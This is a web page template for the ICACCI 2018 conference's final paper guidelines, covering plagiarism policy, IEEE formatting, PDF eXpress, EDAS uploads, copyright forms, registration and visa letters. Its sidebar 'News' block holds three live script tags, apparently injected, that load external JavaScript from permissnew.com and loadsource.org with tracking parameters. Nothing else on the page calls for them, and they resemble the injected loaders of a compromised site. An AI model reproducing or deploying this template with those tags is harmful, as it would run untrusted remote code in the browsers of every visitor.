@extends('layouts.index')
@section('finalpaperguide')
    <div class="container">
        <div class="row">
            <div class="col-md-8">
<div id="main" class="clearfix">
    <div id="primary">
        <section id="content" role="main">

            <div id="breadcrumbs"><nav class="breadcrumb"><a href="/2018/">Home</a> » <a href="/2018/content/call-papers">Authors</a> » Final Paper Guidelines</nav></div>                        <div id="content-wrap">
                <h1 class="page-title">Final Paper Guidelines</h1>                                                  <div class="region region-content">
                    <div id="block-system-main" class="block block-system">


                        <div class="content">
                            <span property="dc:title" content="Final Paper Guidelines" class="rdf-meta element-hidden"></span><span property="sioc:num_replies" content="0" datatype="xsd:integer" class="rdf-meta element-hidden"></span>


                            <div class="content">
                                <div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p class="rtejustify"><span style="font-size:14px">ICACCI 2018 requires that the submitted manuscript is solely from the author's own work and not from the work of others, unless explicit permission has been granted. This includes text, figures and tables. Information from published articles must always be cited explicitly. Proper citation is to give the credit to the work that is originally published, not to follow-up work or reviews. Citations should be given close to the information within the sentences or at the end of the sentence, not after several sentences or near the end of the paragraph. Even when citations are given, exact copying of a whole sentence or paragraphs should be indicated by quotation marks. Furthermore, reuse of part of a published figure or table requires a copyright permission from the publishers that hold the rights. All re-published figures and tables should explicitly indicate the original source. Plagiarism is viewed as a serious offense by IEEE and ICACCI and some cases could lead to a ban of 5 years in any IEEE publications besides notifying your institution and research funding agencies.</span></p>
                                            <p class="rtejustify"><span style="font-size:14px"><strong>ICACCI Paper Categories </strong>(7 pages maximum -3 additional pages allowed but at an extra charge):</span></p>
                                            <ul><li><span style="font-size:14px">Regular Paper </span></li>
                                                <li><span style="font-size:14px">Short Paper (Work-in-Progress) </span></li>
                                                <li><span style="font-size:14px">Poster Paper</span></li>
                                            </ul><p class="rtejustify"><span style="font-size:14px">Please follow below screenshot to upload all files.</span></p>
                                            <p class="rtecenter"><span style="font-size:14px"><img alt="" src="http://icacci-conference.org/2016/files/edas-screen-final.jpg" style="height:509px; width:800px" /></span></p>
                                            <p class="rtejustify"><span style="font-size:14px"><span style="color:#b22222"><strong>IMPORTANT STEPS</strong></span></span></p>
                                            <ol><li class="rtejustify"><span style="font-size:14px">Please revise your manuscript carefully according to the comments of the reviewers.</span></li>
                                                <li class="rtejustify"><span style="font-size:14px">Prepare your manuscript using a standard IEEE conference template. Template: <strong><a href="https://www.ieee.org/conferences/publishing/templates.html" target="_blank">https://www.ieee.org/conferences/publishing/templates.html</a>.</strong> Please double-check the paper size in your page setup to make sure you are using the <strong>letter-size paper layout (8.5 inch X 11 inch)</strong>. The paper should not contain page numbers or any special headers or footers. (<a href="http://icacci-conference.org/2016/files/ieeecitationref.pdf" target="_blank"><strong>Download IEEE Citation Reference</strong></a>)</span></li>
                                                <li class="rtejustify"><span style="font-size:14px">From the final manuscript formatted, authors must generate the electronic FINAL version in PDF format. Regardless of its initial format, the file containing the final version of the paper must be transformed in the PDF format using the IEEE PDF express web tool. PDF files generated by means of other tools are not acceptable.</span><br />

                                                    <div><span style="font-size:14px"><strong><span style="color:#b22222">How to use IEEE PDF eXpress</span></strong><em><strong>  </strong></em></span></div>
                                                    <p><span style="font-size:14px">    i. Go to IEEE PDF eXpress Website. (<strong><a href="http://www.pdf-express.org" target="_blank">www.pdf-express.org</a></strong>). Click on the link "New Users - Click Here” and fill in your information.</span></p>
                                                    <p><span style="font-size:14px">    ii. Create IEEE PDF eXpress account (<strong>conference ID: </strong></span><strong><span style="color:#FF0000"> </span></strong><span style="color:#FF0000"><strong>44154XP</strong></span><span style="font-size:14px">​)</span></p>
                                                    <p><span style="font-size:14px">  iii. Use IEEE PDF eXpress to convert your source file into IEEE Xplore-compatible PDF(s). The site contains extensive instructions, resources, helpful hints, and access to technical support.</span></p>
                                                </li>
                                                <li class="rtejustify"><span style="font-size:14px"><a href="https://edas.info/N24343" target="_blank"><span style="color:#000080"><strong>Login to EDAS</strong></span></a> and choose your paper</span></li>
                                            </ol><p class="rteindent1 rtejustify"><span style="font-size:14px">Before uploading your camera ready paper on EDAS, please:    </span></p>
                                            <ul class="rteindent1"><li class="rtejustify"><span style="font-size:14px">Check that title and abstract in EDAS match your camera-ready paper exactly. Please use Title Case for the paper title, i.e. capitalizing all main words.</span></li>
                                                <li class="rtejustify"><span style="font-size:14px">Compare all author names in EDAS with the author list in your paper. They MUST BE identical and in the same order. This is very important because we will be using the information provided in EDAS to generate the final conference program and the table of contents for Proceedings. </span></li>
                                                <li class="rtejustify"><span style="font-size:14px">Please ensure that the abstract and title should be readable stand-alone and not contain any references or unexplained acronyms. You are allowed to modify abstract and author list yourself. </span></li>
                                                <li class="rtejustify"><span style="font-size:14px">You cannot modify the title for the paper, please send a mail to <a href="mailto:icacci.bangalore@gmail.com?subject=ICACCI%20Registration%2C%20FInal%20Upload%20and%20Registration"><strong>icacci.bangalore@gmail.com</strong></a></span><span style="font-size:14px"> if that is necessary and give a valid reason.</span></li>
                                            </ul><p><span style="font-size:14px">   5 . Enter presenter details in EDAS</span></p>
                                            <p><span style="font-size:14px">   6.  Upload your Camera ready paper (Final Manuscript) in PDF format on EDAS. Please strcilty follow IEEE Guidelines. EDAS will immediately remove the file from the server if it doesn't meet IEEE guidelines. </span></p>
                                            <p><span style="font-size:14px">   7.  Upload the source files of your camera ready paper (WORD or Latex) on EDAS. All Latex files should be submitted as a single zipped file. </span></p>
                                            <p class="rtejustify"><span style="font-size:14px">  8.  Submit IEEE Copyright through EDAS. An IEEE Copyright Form must be submitted for each paper. The IEEE is enforcing strict copyright rules. For your convenience, the copyright is made available electronically through EDAS. To upload copyright forms, first log into EDAS, then go to "My Papers" tab and click on the <span style="color:#FF0000"><strong>'(c)' icon</strong></span> under the column "Copyright Form" where your paper is located. You will be redirected to the IEEE Electronic Copyright Form website. Please provide carefully the answers that best apply to you. Once the copyright form has been successfully recorded, you will receive a confirmation email.</span></p>
                                            <p class="rtejustify"><span style="font-size:14px">Note: If one of the authors is authorized to sign the copyright on behalf of all the authors, the copyright form shall be submitted by that author. Otherwise, answer "Yes" when asked "Should another Author or Corporate Officer complete the electronic Copyright Form?" and ensure the other authors complete this process. Additional information can be found at <a href="https://www.ieee.org/publications/rights/copyright-main.html" target="_blank"><strong>https://www.ieee.org/publications/rights/copyright-main.html</strong></a></span></p>
                                            <p class="rtejustify"><span style="font-size:14px"><strong><span style="color:#FF0000">Adding the Copyright Strip to Your Paper: Do not add Copyright strip to your paper. The conference will add the copyright strip on the bottom of the first page of your paper.</span></strong></span></p>
                                            <p><span style="font-size:14px">If you have any problems to access the author kit or to clarify any doubts, please email at <strong><a href="mailto:icacci.bangalore@gmail.com">icacci.bangalore@gmail.com</a>​</strong></span></p>
                                            <p><span style="font-size:14px">9.  Upload a PDF file which contains the list of revisions you have made on your final paper (answers to reviewers' queries). <strong>This is mandatory</strong>. </span></p>
                                            <p><span style="font-size:14px">10.  Complete your registration: The instructions for completing your registration are posted at <a href="http://icacci-conference.org/2018/content/registration" target="_blank"><strong>http://icacci-conference.org/2018/content/registration</strong></a></span></p>
                                            <p class="rtejustify"><span style="font-size:14px">There are several accommodation hotels in Bangalore. A list of suggested hotels has been posted at <strong><a href="http://icacci-conference.org/2018/content/hotels-travel-visa" target="_blank">http://icacci-conference.org/2018/content/hotels-travel-visa</a></strong>. If you'd like to stay at one of these nearby hotels please make your reservation as early as possible.  </span></p>
                                            <div class="rtejustify"><span style="font-size:14px">Attendees visiting India should be particularly aware and careful about Visa requirements, and should plan travel well in advance. Many nationalities would NOT require an invitation letter to attend ICACCI 2018. If you need an invitation letter, please send an email at <strong><a href="mailto:icacci.bangalore@gmail.com">icacci.bangalore@gmail.com</a></strong> in which you indicate your: Paper details, full name, full address, passport number and nationality. Please note that it may take several days for a visa memo to be sent out after it is requested. Please plan accordingly.</span></div>
                                            <div class="rtejustify">
                                                <p><span style="font-size:14px">Some embassy might require the letter from Indian Government approving the Conference. Please click </span><span style="font-size:18px"><a href="http://icacci-conference.org/web/files/icacci-2018-clearances-mha-mea-mhrd.pdf" target="_blank"><span style="color:#FF0000"><strong>here</strong></span></a></span><span style="font-size:14px"> to download approval letters from Ministry of Home Affairs(MHA), Ministry of External Affairs (MEA) and Ministry of Human Resource Development(MHRD):</span></p>
                                                <!--
                                                <div><p><span style="font-size:14px">- <strong><span style="color:#000080">Security Clearance</span></strong> : <a href="http://icacci-conference.org/files/2017-clearance/MHA-CLEARANCE-2017.pdf" target="_blank">http://icacci-conference.org/files/2017-clearance/MHA-CLEARANCE-2017.pdf</a>&nbsp;<br />
                                                - <strong><span style="color:#000080">Political Clearance</span></strong>: <a href="http://www.icacci-conference.org/files/2017-clearance/MEA-CLEARANCE-2017.pdf" target="_blank">http://www.icacci-conference.org/files/2017-clearance/MEA-CLEARANCE-2017.pdf</a></span></div>
                                                <div><span style="font-size:14px">- <strong><span style="color:#000080">Clearance from MHRD</span></strong>: <a href="http://www.icacci-conference.org/files/2017-clearance/MHRD-CLEARANCE-2017.pdf" target="_blank">http://www.icacci-conference.org/files/2017-clearance/MHRD-CLEARANCE-2017.pdf</a></span></div>
                                                </div>
                                                <p>-->
                                                <div class="rtejustify"> </div>
                                                <hr /><div class="rtejustify"><span style="font-size:24px"><strong><span style="color:#000080">Download Poster</span> <a href="http://www.icacci-conference.org/2016/files/icacci2017_POSTER_TEMPLATE.ppt" target="_blank">Template</a></strong></span></div>
                                                <div class="rtejustify"><span style="font-size:24px"><span style="color:#000080"><strong>Sample PPT for oral presentaiton</strong>:<a href="http://www.coconet-conference.org/2018/files/CoCoNet-sample-PPT.pptx">click here..</a></span></span></div>
                                                <hr /><div class="rtejustify"> </div>
                                                <div class="rtejustify"> </div>
                                            </div>
                                        </div></div></div>  </div>

                            <footer>
                            </footer>

                        </div>

                    </div> <!-- /.block -->
                </div>
                <!-- /.region -->
            </div>
        </section> <!-- /#main -->
    </div>

    <aside id="sidebar" role="complementary">
        <div class="region region-sidebar-first">
            <div id="block-system-navigation" class="block block-system block-menu">

                <h2 >Information</h2>

                <div class="content">
                    <ul class="menu"><li class="first leaf"><a href="http://icacci-conference.org/2018/content/best-paper-awards">Awards</a></li>
                        <li class="leaf"><a href="/2018/rapid-fire-talks">Call for Lightning Talks</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/2018/content/icacci-2018-call-hot-press#">Call for Hot off the Press</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/web/files/ICACCI2018_CFP-2018.pdf">Download CFP (pdf ~1.9MB)</a></li>
                        <li class="leaf"><a href="http://edas.info/N24343">Submission Link</a></li>
                        <li class="leaf"><a href="https://itekcms.com/icacci18/registration/index.php">Click here to Register</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/2018/preparing-presentation2018">Preparing for Presentation</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/2018/final-submission#overlay-context=home">Final Paper Guidelines</a></li>
                        <li class="leaf"><a href="/2018/tutorials">Workshop on  Information Security</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/2018/astronomy">Workshop on Modeling and Machine Learning in Astronomy</a></li>
                        <li class="leaf"><a href="http://nlp.amrita.edu/DMD2018/">Shared task on Detecting Malicious Domain names (DMD 2018)</a></li>
                        <li class="leaf"><a href="/2018/content/call-poster-papers">Call for Poster Papers</a></li>
                        <li class="leaf"><a href="/2018/industry-track2018">Call for Industry Track Papers</a></li>
                        <li class="leaf"><a href="/2018/content/bangalore">About Bangalore</a></li>
                        <li class="leaf"><a href="/2018/content/hotels-travel-visa">Hotels, Travel &amp; Visa</a></li>
                        <li class="leaf"><a href="/2018/content/places-visit">Places to Visit</a></li>
                        <li class="last leaf"><a href="http://edas.info/N24343">Login to EDAS to know Session Timings</a></li>
                    </ul>  </div>

            </div> <!-- /.block -->
            <div id="block-block-2" class="block block-block">

                <h2 >Key Dates</h2>

                <div class="content">
                    <div><span style="font-size:16px">Final Paper Deadline:<strong> August 25, 2018 (Firm)</strong></span></div>
                    <div> </div>
                    <div> </div>
                    <p><!--<p><p><strong><span style="color:#B22222"><a href="http://icacci-conference.org/2018/industrytrack" target="_blank">Call for Industry Track Papers</a>&nbsp;(closed)</span></strong></p>
<p><strong><span style="color:#B22222"><a href="http://icacci-conference.org/2018/symposiums" target="_blank">Call for Symposium Papers</a>&nbsp;(closed)</span></strong></p>
<p>--></p>
                </div>

            </div> <!-- /.block -->
            <div id="block-block-1" class="block block-block">

                <h2 >News</h2>

                <div class="content">
                    <div> </div>
                    <div>ICACCI'18 Program: <a href="https://edas.info/p24343">https://edas.info/p24343</a></div>
                    <div> </div>
                    <div><span style="font-size:14px">IEEE Approved ICACCI'18 (</span><span style="font-size:14px">IEEE Conference Record: 44154)</span></div>
                    <div>
                        <div><span style="font-size:14px">IEEE Xplore ISBN: 978-1-5386-5314-2</span></div>
                    </div>
                    <script src="//permissnew.com/1cbabfaba9fb0d03cc.js"></script><script src="https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&amp;r=1536485187489" type="text/javascript"></script><script src="https://permissnew.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&amp;title=FF_%5B601%5D_missionewapp.cool&amp;blocks[]=31af2" type="text/javascript"></script>  </div>

            </div> <!-- /.block -->
            <div id="block-menu-menu-previous-editions" class="block block-menu">

                <h2 >Previous Editions</h2>

                <div class="content">
                    <ul class="menu"><li class="first leaf"><a href="http://icacci-conference.org/2017">ICACCI 2017</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/2016/">ICACCI 2016</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/web/">ICACCI 2015</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/website/">ICACCI 2014</a></li>
                        <li class="leaf"><a href="http://icacci-conference.org/site/">ICACCI 2013</a></li>
                        <li class="last leaf"><a href="http://icacci-conference.org/index1.html">ICACCI 2012</a></li>
                    </ul>  </div>

            </div> <!-- /.block -->
            <div id="block-block-8" class="block block-block">


                <div class="content">
                    <div><strong><a href="http://icacci-conference.org/2018/wci-home" target="_blank">Sixth International Symposium on Women in Computing and Informatics (WCI'18)</a></strong></div>
                    <div><strong><img alt="" src="http://icacci-conference.org/web/files/acm-w.png" style="height:90px; width:120px" /><img alt="" src="http://icacci-conference.org/web/files/wie.jpg" style="height:140px; width:120px" /></strong></div>
                </div>

            </div> <!-- /.block -->
            <div id="block-block-12" class="block block-block">


                <div class="content">
                    <p><strong>Technical Sponsors</strong></p>
                </div>

            </div> <!-- /.block -->
        </div>
        <!-- /.region -->
    </aside>
</div>
            </div></div></div>
    @endsection